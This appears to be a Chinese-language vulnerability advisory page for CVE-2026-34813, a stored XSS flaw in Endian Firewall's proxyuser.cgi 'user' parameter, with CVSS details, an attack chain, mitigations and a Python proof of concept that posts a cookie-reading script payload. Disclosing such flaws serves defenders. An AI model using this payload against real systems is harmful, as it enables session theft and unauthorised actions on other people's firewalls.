IPBUF安全漏洞报告
English
CVE-2026-34813 CVSS 6.4 中危

CVE-2026-34813 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34813
漏洞类型
存储型跨站脚本
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

XSS存储型跨站脚本Endian FirewallWeb安全CVE-2026-34813认证后攻击

漏洞概述

Endian Firewall 3.3.25及之前版本存在存储型XSS漏洞。通过`/cgi-bin/proxyuser.cgi`接口的`user`参数,认证攻击者可注入恶意脚本。该脚本被存储并在其他用户浏览时执行,可能导致窃取凭证或未授权操作。

技术细节

该漏洞源于Endian Firewall在处理代理用户配置时的输入验证缺失。具体而言,`/cgi-bin/proxyuser.cgi`脚本未能正确过滤`user`参数中的恶意字符。攻击者利用低权限账户登录后,可构造包含JavaScript代码的Payload通过POST请求提交。由于缺乏输出编码,该Payload被持久化存储。当管理员或其他具备高权限的用户访问受影响的代理用户管理页面时,嵌入的恶意代码将在其浏览器中解析执行。此过程利用了DOM环境,攻击者可借此窃取Session ID、执行未授权操作或进行钓鱼攻击。CVSS 3.1评分为6.4,表明虽然无需用户交互即可触发,但攻击需要认证且对系统底层可用性无直接影响。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统为Endian Firewall,且版本在3.3.25及以下。
STEP 2
2. 获取凭证
攻击者通过钓鱼或其他方式获取一个低权限账户的登录凭证。
STEP 3
3. 注入Payload
攻击者登录后台,向/cgi-bin/proxyuser.cgi发送包含恶意JS代码的POST请求,利用user参数注入XSS。
STEP 4
4. 持久化存储
服务器端未过滤恶意代码,将其存储在数据库或配置文件中。
STEP 5
5. 触发漏洞
管理员或其他用户访问受影响的页面时,恶意脚本自动加载并执行,窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip/cgi-bin/proxyuser.cgi" # Attacker's session cookie (Authentication required) cookies = { "EFWSESSID": "stolen_or_valid_session_cookie" } # Malicious payload injected into the 'user' parameter payload = '<script>alert(document.cookie);</script>' # Data payload to be sent post_data = { "user": payload, "action": "save" } try: # Send the malicious request response = requests.post(url, data=post_data, cookies=cookies) if response.status_code == 200: print("[+] Payload sent successfully.") print("[!] Check the user management page to verify XSS execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在升级补丁发布前,建议限制对管理控制台的访问,仅允许可信的内网IP访问。管理员在处理用户数据时应保持警惕,并考虑在浏览器中暂时禁用JavaScript以降低风险,但这可能影响系统正常使用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表